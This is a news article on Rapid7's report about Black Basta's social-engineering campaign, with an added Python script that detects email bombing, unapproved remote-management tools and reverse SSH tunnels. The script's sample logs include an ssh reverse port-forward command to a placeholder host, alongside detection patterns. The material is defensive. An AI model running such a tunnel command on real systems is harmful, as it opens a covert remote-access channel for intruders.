Black Basta ransomware has resurfaced with more sophisticated social engineering tactics and now uses a variety of malware alongside legitimate remote management tools.
The ransomware group known as Black Basta has been running a renewed campaign since October, built around social engineering, security firm Rapid7 warns. The campaign originally began in May; in August the group changed its strategy and tactics, and by October the new approach was in active use. New malware, new malware distribution methods and improved detection-evasion techniques stand out.
The new campaigns start similarly to the old ones, Rapid7 said. “The attacker first sends an email bomb to the victim. A lot of emails end up in the victim's inbox, which makes it difficult for the victim to use their email normally. Then the attackers reach out to the victim, usually through MS Teams, but sometimes they make a phone call or send a text message. The goal is to lure the victim in by saying, ‘Hey, you're having problems with your email and I can help.’ They usually pretend to be from the IT support team of the victim's company, so it's easy for the victim to fall for it.”
Once the victim is fooled and starts to respond, the attacker takes the next step: installing a remote management tool. With legitimate tools like Quick Assist, AnyDesk, TeamViewer, Level and ScreenConnect, victims have little reason to be suspicious. “But that's not all,” Rapid7 adds, “they also exploited OpenSSH clients to set up reverse shells, and shared QR codes, presumably to get the user's credentials and get past multi-factor authentication mechanisms.”
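As an added example (it is not Rapid7's code and does not come from the article), the following Python hunts for the initial-access chain just described in constructed endpoint and mail-gateway records: an email bomb against one mailbox, a remote management tool the organisation has not approved starting up, and an OpenSSH client launched with a remote port forward (`-R`), the primitive behind the reverse shells mentioned. The executable names, the log fields, the 50-messages-in-10-minutes threshold and the assumption that a mailbox's local part equals the Windows account name are all assumptions for the example, not details from the report.

```python
"""Added triage example (not Rapid7's code, not from the article): look for the
initial-access chain described above in constructed endpoint and mail records.
Executable names, log fields and thresholds are assumptions."""
import re
from datetime import datetime, timedelta

# Remote management products named in the article, keyed by the executable name
# each is assumed to run under on Windows (assumption: verify in your own estate).
RMM_BINARIES = {
    "quickassist.exe": "Quick Assist", "anydesk.exe": "AnyDesk",
    "teamviewer.exe": "TeamViewer", "level.exe": "Level",
    "screenconnect.clientservice.exe": "ScreenConnect",
    "screenconnect.windowsclient.exe": "ScreenConnect",
}
# An ssh option cluster containing -R (remote forward): "-R 2222:..." or "-NR 2222:..."
REVERSE_FORWARD = re.compile(r"(?:^|\s)-[A-Za-z]*R(?=\s|\d|\[|$)")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def account(name):
    """'CORP\\jdoe' -> 'jdoe'; 'jdoe@corp.example' -> 'jdoe' (assumes mailbox == account name)."""
    return name.rsplit("\\", 1)[-1].split("@", 1)[0].lower()

def detect_rmm(event, approved=frozenset()):
    """Flag a remote management tool the organisation has not sanctioned."""
    product = RMM_BINARIES.get(basename(event["image"]))
    if product and product not in approved:
        return {"rule": "unapproved_rmm", "user": account(event["user"]),
                "ts": event["ts"], "detail": product}
    return None

def detect_reverse_ssh(event):
    """Flag an OpenSSH client started with a remote port forward (reverse tunnel)."""
    if basename(event["image"]) in ("ssh.exe", "ssh") and REVERSE_FORWARD.search(event["cmdline"]):
        return {"rule": "reverse_ssh_tunnel", "user": account(event["user"]),
                "ts": event["ts"], "detail": event["cmdline"]}
    return None

def detect_email_bomb(mail_events, window=timedelta(minutes=10), threshold=50):
    """Flag recipients receiving >= threshold messages inside any window-long
    interval (sliding window over each recipient's sorted timestamps)."""
    by_rcpt = {}
    for ev in mail_events:
        by_rcpt.setdefault(ev["rcpt"], []).append(datetime.fromisoformat(ev["ts"]))
    hits = []
    for rcpt, times in by_rcpt.items():
        times.sort()
        j = 0
        for i, start in enumerate(times):
            while j < len(times) and times[j] - start <= window:
                j += 1  # j = first timestamp outside the window opened at start
            if j - i >= threshold:
                hits.append({"rule": "mail_bomb", "user": account(rcpt), "ts": start.isoformat(),
                             "detail": f"{j - i} messages in {window}"})
                break  # one finding per recipient is enough for triage
    return hits

def triage(process_events, mail_events, approved=frozenset()):
    """Run every rule; return (findings, users that show mail bomb + remote access)."""
    findings = []
    for ev in process_events:
        findings += [f for f in (detect_rmm(ev, approved), detect_reverse_ssh(ev)) if f]
    findings += detect_email_bomb(mail_events)
    rules_by_user = {}
    for f in findings:
        rules_by_user.setdefault(f["user"], set()).add(f["rule"])
    chains = sorted(u for u, r in rules_by_user.items()
                    if "mail_bomb" in r and r & {"unapproved_rmm", "reverse_ssh_tunnel"})
    return findings, chains

# Constructed sample telemetry (not real data): simplified Sysmon Event ID 1
# process events and mail-gateway delivery records; 203.0.113.0/24 is TEST-NET-3.
PROCESS_EVENTS = [
    {"ts": "2024-10-14T09:31:02", "user": "CORP\\jdoe", "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe",
     "cmdline": "\"C:\\Program Files\\AnyDesk\\AnyDesk.exe\" --install"},
    {"ts": "2024-10-14T09:40:17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 support@203.0.113.7"},
    {"ts": "2024-10-14T10:02:45", "user": "CORP\\asmith", "image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe",
     "cmdline": "\"C:\\Program Files\\TeamViewer\\TeamViewer.exe\""},
    {"ts": "2024-10-14T10:05:10", "user": "CORP\\asmith", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -p 22 git@203.0.113.9 git-upload-pack repo"},
]
_T0 = datetime(2024, 10, 14, 9, 15, 0)
MAIL_EVENTS = [{"ts": (_T0 + timedelta(seconds=10 * k)).isoformat(), "rcpt": "jdoe@corp.example",
                "sender": f"list{k}@example.net"} for k in range(60)]  # 60 mails in 10 minutes
MAIL_EVENTS += [{"ts": t, "rcpt": "asmith@corp.example", "sender": "colleague@corp.example"}
                for t in ("2024-10-14T08:02:00", "2024-10-14T09:45:30", "2024-10-14T11:10:00")]

if __name__ == "__main__":
    findings, chains = triage(PROCESS_EVENTS, MAIL_EVENTS, approved=frozenset({"TeamViewer"}))
    for f in findings:
        print(f"{f['ts']}  {f['rule']:<19} {f['user']:<7} {f['detail']}")
    print("users showing the full chain:", chains)
```

The allowlist is the important design choice: every tool in the list is legitimate, so the rule only pays off when it is keyed to the products the organisation actually sanctions, and it is the per-user correlation of a flooded mailbox with a new remote-access channel, rather than any single event, that distinguishes this chain from ordinary helpdesk activity.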
So far, these steps serve to get into the victim's system. If they succeed, the next step is to deliver the malicious payload, which can happen in several ways. Rapid7 explains that these include:
1) Compromised SharePoint instances
2) File-sharing websites
3) Servers leased through hosting providers
4) Direct upload through remote administration tools, proxies and the remote control session itself.
The payload is planted to accomplish several objectives, including:
1) Quickly enumerating the victim's environment while harvesting the victim's credentials.
2) Stealing VPN configuration files.
3) Bypassing multi-factor authentication and using the VPN information and credentials to penetrate deeper into the network.
To accomplish these goals, Black Basta has used a number of tools and malware, including:
1) A credential harvester
2) Zbot: a malware loader
3) DarkGate: a malware loader
4) Cobalt Strike Beacon: a post-exploitation command-and-control implant (not a loader)
5) A multithreaded beacon capable of remotely executing PowerShell
Now here's where things get unusual. This is a ransomware group, but in these campaigns it is not deploying ransomware payloads. “Ransomware attackers are evolving rapidly, and we can see where they're headed. First of all, they're leveraging legitimate, normal tools, and even if they're not, they're disguising them to look legitimate. And secondly, even though they're ransomware actors, they're putting more emphasis on stealing information than they are on embarrassing their victims with ransomware.”